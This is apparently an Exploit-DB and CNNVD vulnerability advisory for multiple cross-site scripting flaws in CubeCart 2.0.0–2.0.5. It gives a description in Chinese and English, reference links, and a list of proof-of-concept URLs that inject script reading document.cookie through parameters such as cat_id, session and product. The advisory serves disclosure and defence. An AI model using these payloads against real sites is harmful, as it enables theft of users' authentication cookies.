https://www.exploit-db.com/exploits/25162
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-234

CubeCart2.0.0至2.0.5的settings.inc.php当在多个PHP文件中使用时，其包含的跨站脚本攻击(XSS)漏洞允许远程攻击者通过(1)cat_id，(2)PHPSESSID，(3)view_doc，(4)product，(5)session，(6)catname，(7)search或(8)page参数来注入任意HTML或Web脚本。

source: http://www.securityfocus.com/bid/12658/info


CubeCart is affected by multiple cross-site scripting vulnerabilities; an upgrade is available.

These issues exist because the application fails to properly sanitize user-supplied input.

As a result of these vulnerabilities, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

http://www.example.com/cubecart/?"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/view_order.php?cat_id=1"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/forgot_pass.php?catname='pruebas1'"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/index.php?cat_id=5"><body><p><h1>CubeCart XSS Pow@ !!!</h1></p>/<body>
http://www.example.com/cubecart/view_order.php?session=1"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/view_order.php?product=1"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/your_orders.php?cat_id="><script>document.write(document.cookie)</script>
http://www.example.com/cubecart/view_product.php?product=1"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/tellafriend.php?product=1&session="><script>alert(document.cookie)</script>
http://www.example.com/cubecart/tellafriend.php?product=1"><script>document.write(document.cookie)</script>
http://www.example.com/cubecart/login.php?session="><script>alert(document.cookie);</script>
http://www.example.com/cubecart/search.php?search=".,script.alert(document.cookie)</script>

来源:BID
名称:12658
链接:http://www.securityfocus.com/bid/12658
来源:www.cubecart.com
链接:http://www.cubecart.com/site/forums/index.php?showtopic=6032
来源:XF
名称:cubecart-multiple-xss(20637)
链接:http://xforce.iss.net/xforce/xfdb/20637
来源:SECTRACK
名称:1013304
链接:http://securitytracker.com/id?1013304
来源:SECUNIA
名称:14416
链接:http://secunia.com/advisories/14416
来源:MISC
链接:http://lostmon.blogspot.com/2005/02/cubecart-20x-multiple-variable-xss.html